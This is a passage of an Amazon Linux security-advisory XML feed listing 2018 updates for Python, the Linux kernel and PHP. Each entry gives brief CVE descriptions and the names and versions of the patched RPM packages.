ALAS-2018-943: medium priority package update for python35 python34</title><issued date="2018-01-17 23:18:00" /><updated date="2018-01-18 00:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000158:
CPython (aka Python) up to 2.7.13 is vulnerable to an integer overflow in the PyString_DecodeEscape function in stringobject.c, resulting in a heap-based buffer overflow (and possible arbitrary code execution).
1519595:
CVE-2017-1000158 python: Integer overflow in PyString_DecodeEscape results in heap-based buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000158" title="" id="CVE-2017-1000158" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python35-libs" version="3.5.4" release="13.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.4-13.10.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.4" release="13.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.4-13.10.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.4" release="13.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.4-13.10.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.4" release="13.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.4-13.10.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.4" release="13.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.4-13.10.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.4" release="13.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.4-13.10.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.4" release="13.10.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.4-13.10.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.4" release="13.10.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.4-13.10.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.4" release="13.10.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.4-13.10.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.4" release="13.10.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.4-13.10.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" 
version="3.5.4" release="13.10.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.4-13.10.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.4" release="13.10.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.4-13.10.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.7" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.7-1.37.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.7" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.7-1.37.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.7" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.7-1.37.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.7" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.7-1.37.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.7" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.7-1.37.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.7" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.7-1.37.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.7" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.7-1.37.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.7" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.7-1.37.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.7" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.7-1.37.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.7" release="1.37.amzn1" epoch="0" 
arch="i686"><filename>Packages/python34-3.4.7-1.37.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.7" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.7-1.37.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.7" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.7-1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-944</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-944: important priority package update for kernel</title><issued date="2018-01-18 22:45:00" /><updated date="2018-01-18 22:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8824:
A use-after-free vulnerability was found in DCCP socket code affecting the Linux kernel since 2.6.16. This vulnerability could allow an attacker to escalate their privileges.
1519591:
CVE-2017-8824 kernel: Use-after-free vulnerability in DCCP socket
CVE-2017-17741:
A Linux kernel compiled with KVM virtualization (CONFIG_KVM) support is vulnerable to an out-of-bounds read access issue. It could occur when emulating vmcall instructions invoked by a guest. A guest user/process could use this flaw to disclose kernel memory bytes.
1527112:
CVE-2017-17741 kernel: kvm: stack-based out-of-bounds read via vmcall instruction
CVE-2017-17712:
A flaw was found in the Linux kernel&#039;s implementation of raw_sendmsg, allowing a local attacker to panic the kernel or possibly leak kernel addresses. A local attacker, with the privilege of creating raw sockets, can abuse a possible race condition when setting the socket option that allows the kernel to automatically create IP header values, and thus potentially escalate their privileges.
1526427:
CVE-2017-17712 kernel: Race condition in raw_sendmsg function allows denial-of-service or kernel addresses leak
CVE-2017-17450:
net/netfilter/xt_osf.c in the Linux kernel through 4.14.4 does not require the CAP_NET_ADMIN capability for add_callback and remove_callback operations, which allows local users to bypass intended access restrictions because the xt_osf_fingers data structure is shared across all net namespaces.
1525761:
CVE-2017-17450 kernel: Unchecked capabilities in net/netfilter/xt_osf.c allows for unprivileged modification to systemwide fingerprint list
CVE-2017-17448:
net/netfilter/nfnetlink_cthelper.c in the Linux kernel through 4.14.4 does not require the CAP_NET_ADMIN capability for new, get, and del operations, which allows local users to bypass intended access restrictions because the nfnl_cthelper_list data structure is shared across all net namespaces.
1525768:
CVE-2017-17448 kernel: Missing capabilities check in net/netfilter/nfnetlink_cthelper.c allows for unprivileged access to systemwide nfnl_cthelper_list structure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17448" title="" id="CVE-2017-17448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17450" title="" id="CVE-2017-17450" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17712" title="" id="CVE-2017-17712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17741" title="" id="CVE-2017-17741" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8824" title="" id="CVE-2017-8824" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.77" 
release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.77" release="31.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.77-31.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.77" 
release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.77" release="31.58.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.77-31.58.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.77" release="31.58.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.77-31.58.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-945</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-945: medium priority package update for python27</title><issued date="2018-02-07 17:02:00" /><updated date="2018-02-08 21:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000158:
CPython (aka Python) up to 2.7.13 is vulnerable to an integer overflow in the PyString_DecodeEscape function in stringobject.c, resulting in heap-based buffer overflow (and possible arbitrary code execution)
1519595:
CVE-2017-1000158 python: Integer overflow in PyString_DecodeEscape results in heap-based buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000158" title="" id="CVE-2017-1000158" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-debuginfo" version="2.7.13" release="2.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.13-2.122.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.13" release="2.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.13-2.122.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.13" release="2.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.13-2.122.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.13" release="2.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.13-2.122.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.13" release="2.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.13-2.122.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.13" release="2.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.13-2.122.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.13" release="2.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.13-2.122.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.13" release="2.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.13-2.122.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.13" release="2.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.13-2.122.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.13" release="2.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.13-2.122.amzn1.i686.rpm</filename></package><package 
name="python27-tools" version="2.7.13" release="2.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.13-2.122.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.13" release="2.122.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.13-2.122.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-946</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-946: medium priority package update for php56 php70 php71</title><issued date="2018-02-07 17:10:00" /><updated date="2018-02-08 21:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5712:
An issue was discovered in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1. There is Reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file.
1535251:
CVE-2018-5712 php: reflected XSS in .phar 404 page
CVE-2018-5711:
gd_gif_in.c in the GD Graphics Library (aka libgd), as used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1, has an integer signedness error that leads to an infinite loop via a crafted GIF file, as demonstrated by a call to the imagecreatefromgif or imagecreatefromstring PHP function. This is related to GetCode_ and gdImageCreateFromGifCtx.
1535246:
CVE-2018-5711 php: Denial of Service (DoS) via infinite loop in libgd gdImageCreateFromGifCtx function in ext/gd/libgd/gd_gif_in.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5711" title="" id="CVE-2018-5711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5712" title="" id="CVE-2018-5712" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php71-debuginfo" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.13" release="1.30.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php71-ldap-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" 
version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.13" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.13" release="1.30.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php71-bcmath-7.1.13-1.30.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.13" release="1.30.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-tidy-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.13" release="1.30.amzn1" 
epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.13" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.13-1.30.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.27" release="1.27.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.27" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.27-1.27.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" 
